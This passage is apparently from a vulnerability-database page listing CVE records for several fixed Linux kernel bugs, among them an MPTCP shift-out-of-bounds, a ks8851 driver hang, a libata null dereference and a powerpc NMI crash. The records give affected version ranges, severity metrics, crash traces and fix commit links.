"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Correctly set DATA_FIN timeout when number of retransmits is large\n\nSyzkaller with UBSAN uncovered a scenario where a large number of\nDATA_FIN retransmits caused a shift-out-of-bounds in the DATA_FIN\ntimeout calculation:\n\n================================================================================\nUBSAN: shift-out-of-bounds in net/mptcp/protocol.c:470:29\nshift exponent 32 is too large for 32-bit type \u0027unsigned int\u0027\nCPU: 1 PID: 13059 Comm: kworker/1:0 Not tainted 5.17.0-rc2-00630-g5fbf21c90c60 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n ubsan_epilogue+0xb/0x5a lib/ubsan.c:151\n __ubsan_handle_shift_out_of_bounds.cold+0xb2/0x20e lib/ubsan.c:330\n mptcp_set_datafin_timeout net/mptcp/protocol.c:470 [inline]\n __mptcp_retrans.cold+0x72/0x77 net/mptcp/protocol.c:2445\n mptcp_worker+0x58a/0xa70 net/mptcp/protocol.c:2528\n process_one_work+0x9df/0x16d0 kernel/workqueue.c:2307\n worker_thread+0x95/0xe10 kernel/workqueue.c:2454\n kthread+0x2f4/0x3b0 kernel/kthread.c:377\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:295\n \u003c/TASK\u003e\n================================================================================\n\nThis change limits the maximum timeout by limiting the size of the\nshift, which keeps all intermediate values in-bounds."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:43:58.850Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0c3f34beb459753f9f80d0cc14c1b50ab615c631"
},
{
"url": "https://git.kernel.org/stable/c/03ae283bd71f761feae3f402668d698b393b0e79"
},
{
"url": "https://git.kernel.org/stable/c/877d11f0332cd2160e19e3313e262754c321fa36"
}
],
"title": "mptcp: Correctly set DATA_FIN timeout when number of retransmits is large",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48906",
"datePublished": "2024-08-22T01:30:40.850Z",
"dateReserved": "2024-08-21T06:06:23.292Z",
"dateUpdated": "2025-05-04T12:43:58.850Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36962 (GCVE-0-2024-36962)
Vulnerability from cvelistv5
Published
2024-06-03 07:50
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ks8851: Queue RX packets in IRQ handler instead of disabling BHs
Currently the driver uses local_bh_disable()/local_bh_enable() in its
IRQ handler to avoid triggering net_rx_action() softirq on exit from
netif_rx(). The net_rx_action() could trigger this driver .start_xmit
callback, which is protected by the same lock as the IRQ handler, so
calling the .start_xmit from netif_rx() from the IRQ handler critical
section protected by the lock could lead to an attempt to claim the
already claimed lock, and a hang.
The local_bh_disable()/local_bh_enable() approach works only in case
the IRQ handler is protected by a spinlock, but does not work if the
IRQ handler is protected by mutex, i.e. this works for KS8851 with
Parallel bus interface, but not for KS8851 with SPI bus interface.
Remove the BH manipulation and instead of calling netif_rx() inside
the IRQ handler code protected by the lock, queue all the received
SKBs in the IRQ handler into a queue first, and once the IRQ handler
exits the critical section protected by the lock, dequeue all the
queued SKBs and push them all into netif_rx(). At this point, it is
safe to trigger the net_rx_action() softirq, since the netif_rx()
call is outside of the lock that protects the IRQ handler.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36962",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-03T18:04:06.438716Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T16:21:03.956Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.389Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a3ff43dcbab7c96f9e8cf2bd1049ab8d6e59545"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae87f661f3c1a3134a7ed86ab69bf9f12af88993"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e2901a2a9195da76111f351584bf77552a038f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e0863634bf9f7cf36291ebb5bfa2d16632f79c49"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8a3ff43dcbab7c96f9e8cf2bd1049ab8d6e59545",
"status": "affected",
"version": "492337a4fbd1421b42df684ee9b34be2a2722540",
"versionType": "git"
},
{
"lessThan": "ae87f661f3c1a3134a7ed86ab69bf9f12af88993",
"status": "affected",
"version": "cba376eb036c2c20077b41d47b317d8218fe754f",
"versionType": "git"
},
{
"lessThan": "7e2901a2a9195da76111f351584bf77552a038f0",
"status": "affected",
"version": "49d5d70538b6b8f2a3f8f1ac30c1f921d4a0929b",
"versionType": "git"
},
{
"lessThan": "e0863634bf9f7cf36291ebb5bfa2d16632f79c49",
"status": "affected",
"version": "be0384bf599cf1eb8d337517feeb732d71f75a6f",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/micrel/ks8851_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.1.91",
"status": "affected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThan": "6.6.31",
"status": "affected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThan": "6.8.10",
"status": "affected",
"version": "6.8.7",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "6.1.87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "6.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "6.8.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ks8851: Queue RX packets in IRQ handler instead of disabling BHs\n\nCurrently the driver uses local_bh_disable()/local_bh_enable() in its\nIRQ handler to avoid triggering net_rx_action() softirq on exit from\nnetif_rx(). The net_rx_action() could trigger this driver .start_xmit\ncallback, which is protected by the same lock as the IRQ handler, so\ncalling the .start_xmit from netif_rx() from the IRQ handler critical\nsection protected by the lock could lead to an attempt to claim the\nalready claimed lock, and a hang.\n\nThe local_bh_disable()/local_bh_enable() approach works only in case\nthe IRQ handler is protected by a spinlock, but does not work if the\nIRQ handler is protected by mutex, i.e. this works for KS8851 with\nParallel bus interface, but not for KS8851 with SPI bus interface.\n\nRemove the BH manipulation and instead of calling netif_rx() inside\nthe IRQ handler code protected by the lock, queue all the received\nSKBs in the IRQ handler into a queue first, and once the IRQ handler\nexits the critical section protected by the lock, dequeue all the\nqueued SKBs and push them all into netif_rx(). At this point, it is\nsafe to trigger the net_rx_action() softirq, since the netif_rx()\ncall is outside of the lock that protects the IRQ handler."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:54.685Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8a3ff43dcbab7c96f9e8cf2bd1049ab8d6e59545"
},
{
"url": "https://git.kernel.org/stable/c/ae87f661f3c1a3134a7ed86ab69bf9f12af88993"
},
{
"url": "https://git.kernel.org/stable/c/7e2901a2a9195da76111f351584bf77552a038f0"
},
{
"url": "https://git.kernel.org/stable/c/e0863634bf9f7cf36291ebb5bfa2d16632f79c49"
}
],
"title": "net: ks8851: Queue RX packets in IRQ handler instead of disabling BHs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36962",
"datePublished": "2024-06-03T07:50:00.425Z",
"dateReserved": "2024-05-30T15:25:07.081Z",
"dateUpdated": "2025-05-04T09:12:54.685Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41098 (GCVE-0-2024-41098)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ata: libata-core: Fix null pointer dereference on error
If the ata_port_alloc() call in ata_host_alloc() fails,
ata_host_release() will get called.
However, the code in ata_host_release() tries to free ata_port struct
members unconditionally, which can lead to the following:
BUG: unable to handle page fault for address: 0000000000003990
PGD 0 P4D 0
Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 10 PID: 594 Comm: (udev-worker) Not tainted 6.10.0-rc5 #44
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014
RIP: 0010:ata_host_release.cold+0x2f/0x6e [libata]
Code: e4 4d 63 f4 44 89 e2 48 c7 c6 90 ad 32 c0 48 c7 c7 d0 70 33 c0 49 83 c6 0e 41
RSP: 0018:ffffc90000ebb968 EFLAGS: 00010246
RAX: 0000000000000041 RBX: ffff88810fb52e78 RCX: 0000000000000000
RDX: 0000000000000000 RSI: ffff88813b3218c0 RDI: ffff88813b3218c0
RBP: ffff88810fb52e40 R08: 0000000000000000 R09: 6c65725f74736f68
R10: ffffc90000ebb738 R11: 73692033203a746e R12: 0000000000000004
R13: 0000000000000000 R14: 0000000000000011 R15: 0000000000000006
FS: 00007f6cc55b9980(0000) GS:ffff88813b300000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000003990 CR3: 00000001122a2000 CR4: 0000000000750ef0
PKRU: 55555554
Call Trace:
<TASK>
? __die_body.cold+0x19/0x27
? page_fault_oops+0x15a/0x2f0
? exc_page_fault+0x7e/0x180
? asm_exc_page_fault+0x26/0x30
? ata_host_release.cold+0x2f/0x6e [libata]
? ata_host_release.cold+0x2f/0x6e [libata]
release_nodes+0x35/0xb0
devres_release_group+0x113/0x140
ata_host_alloc+0xed/0x120 [libata]
ata_host_alloc_pinfo+0x14/0xa0 [libata]
ahci_init_one+0x6c9/0xd20 [ahci]
Do not access ata_port struct members unconditionally.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 Version: 633273a3ed1cf37ced90475b0f95cf81deab04f1 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.597Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/119c97ace2a9ffcf4dc09a23bb057d6c281aff28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a8ff7e3b736a70d7b7c8764cbcd2724d4079ec8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d92c7c566dc76d96e0e19e481d926bbe6631c1e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41098",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:15.779725Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:08.738Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/ata/libata-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d9c4df80b1b009de1eb77c07e3bb4d45bd212aa5",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "56e62977eaaae3eb7122ee2cf9b720b6703114a9",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "e83405e75d90694ee6a5d898f7f0473ac2686054",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "221e3b1297e74fdec32d0f572f4dcb2260a0a2af",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "0f0d37c154bb108730c90a91aa31e3170e827962",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "119c97ace2a9ffcf4dc09a23bb057d6c281aff28",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "8a8ff7e3b736a70d7b7c8764cbcd2724d4079ec8",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
},
{
"lessThan": "5d92c7c566dc76d96e0e19e481d926bbe6631c1e",
"status": "affected",
"version": "633273a3ed1cf37ced90475b0f95cf81deab04f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/ata/libata-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.24"
},
{
"lessThan": "2.6.24",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.108",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.108",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-core: Fix null pointer dereference on error\n\nIf the ata_port_alloc() call in ata_host_alloc() fails,\nata_host_release() will get called.\n\nHowever, the code in ata_host_release() tries to free ata_port struct\nmembers unconditionally, which can lead to the following:\n\nBUG: unable to handle page fault for address: 0000000000003990\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 10 PID: 594 Comm: (udev-worker) Not tainted 6.10.0-rc5 #44\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:ata_host_release.cold+0x2f/0x6e [libata]\nCode: e4 4d 63 f4 44 89 e2 48 c7 c6 90 ad 32 c0 48 c7 c7 d0 70 33 c0 49 83 c6 0e 41\nRSP: 0018:ffffc90000ebb968 EFLAGS: 00010246\nRAX: 0000000000000041 RBX: ffff88810fb52e78 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: ffff88813b3218c0 RDI: ffff88813b3218c0\nRBP: ffff88810fb52e40 R08: 0000000000000000 R09: 6c65725f74736f68\nR10: ffffc90000ebb738 R11: 73692033203a746e R12: 0000000000000004\nR13: 0000000000000000 R14: 0000000000000011 R15: 0000000000000006\nFS: 00007f6cc55b9980(0000) GS:ffff88813b300000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000003990 CR3: 00000001122a2000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __die_body.cold+0x19/0x27\n ? page_fault_oops+0x15a/0x2f0\n ? exc_page_fault+0x7e/0x180\n ? asm_exc_page_fault+0x26/0x30\n ? ata_host_release.cold+0x2f/0x6e [libata]\n ? ata_host_release.cold+0x2f/0x6e [libata]\n release_nodes+0x35/0xb0\n devres_release_group+0x113/0x140\n ata_host_alloc+0xed/0x120 [libata]\n ata_host_alloc_pinfo+0x14/0xa0 [libata]\n ahci_init_one+0x6c9/0xd20 [ahci]\n\nDo not access ata_port struct members unconditionally."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:04.237Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d9c4df80b1b009de1eb77c07e3bb4d45bd212aa5"
},
{
"url": "https://git.kernel.org/stable/c/56e62977eaaae3eb7122ee2cf9b720b6703114a9"
},
{
"url": "https://git.kernel.org/stable/c/e83405e75d90694ee6a5d898f7f0473ac2686054"
},
{
"url": "https://git.kernel.org/stable/c/221e3b1297e74fdec32d0f572f4dcb2260a0a2af"
},
{
"url": "https://git.kernel.org/stable/c/0f0d37c154bb108730c90a91aa31e3170e827962"
},
{
"url": "https://git.kernel.org/stable/c/119c97ace2a9ffcf4dc09a23bb057d6c281aff28"
},
{
"url": "https://git.kernel.org/stable/c/8a8ff7e3b736a70d7b7c8764cbcd2724d4079ec8"
},
{
"url": "https://git.kernel.org/stable/c/5d92c7c566dc76d96e0e19e481d926bbe6631c1e"
}
],
"title": "ata: libata-core: Fix null pointer dereference on error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41098",
"datePublished": "2024-07-29T15:48:11.093Z",
"dateReserved": "2024-07-12T12:17:45.637Z",
"dateUpdated": "2025-05-04T09:22:04.237Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42126 (GCVE-0-2024-42126)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc: Avoid nmi_enter/nmi_exit in real mode interrupt.
nmi_enter()/nmi_exit() touches per cpu variables which can lead to kernel
crash when invoked during real mode interrupt handling (e.g. early HMI/MCE
interrupt handler) if percpu allocation comes from vmalloc area.
Early HMI/MCE handlers are called through DEFINE_INTERRUPT_HANDLER_NMI()
wrapper which invokes nmi_enter/nmi_exit calls. We don't see any issue when
percpu allocation is from the embedded first chunk. However with
CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK enabled there are chances where percpu
allocation can come from the vmalloc area.
With kernel command line "percpu_alloc=page" we can force percpu allocation
to come from vmalloc area and can see kernel crash in machine_check_early:
[ 1.215714] NIP [c000000000e49eb4] rcu_nmi_enter+0x24/0x110
[ 1.215717] LR [c0000000000461a0] machine_check_early+0xf0/0x2c0
[ 1.215719] --- interrupt: 200
[ 1.215720] [c000000fffd73180] [0000000000000000] 0x0 (unreliable)
[ 1.215722] [c000000fffd731b0] [0000000000000000] 0x0
[ 1.215724] [c000000fffd73210] [c000000000008364] machine_check_early_common+0x134/0x1f8
Fix this by avoiding use of nmi_enter()/nmi_exit() in real mode if percpu
first chunk is not embedded.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: eb553f16973ade990d05946af9ae191394712c8a Version: eb553f16973ade990d05946af9ae191394712c8a Version: eb553f16973ade990d05946af9ae191394712c8a Version: eb553f16973ade990d05946af9ae191394712c8a Version: eb553f16973ade990d05946af9ae191394712c8a Version: eb553f16973ade990d05946af9ae191394712c8a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.570Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d3f83dfb23674540c827a8d65fba20aa300b252"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f37946c62c48a907625348cbc720a7a0c547d1e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c78c9411e685dbc9eac8c2845111b03501975b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0db880fc865ffb522141ced4bfa66c12ab1fbb70"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42126",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:16:41.546139Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:04.533Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/interrupt.h",
"arch/powerpc/include/asm/percpu.h",
"arch/powerpc/kernel/setup_64.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fb6675db04c4b79883373edc578d5df7bbc84848",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
},
{
"lessThan": "e2afb26615adf6c3ceaaa7732aa839bcd587a057",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
},
{
"lessThan": "8d3f83dfb23674540c827a8d65fba20aa300b252",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
},
{
"lessThan": "0f37946c62c48a907625348cbc720a7a0c547d1e",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
},
{
"lessThan": "2c78c9411e685dbc9eac8c2845111b03501975b8",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
},
{
"lessThan": "0db880fc865ffb522141ced4bfa66c12ab1fbb70",
"status": "affected",
"version": "eb553f16973ade990d05946af9ae191394712c8a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/interrupt.h",
"arch/powerpc/include/asm/percpu.h",
"arch/powerpc/kernel/setup_64.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
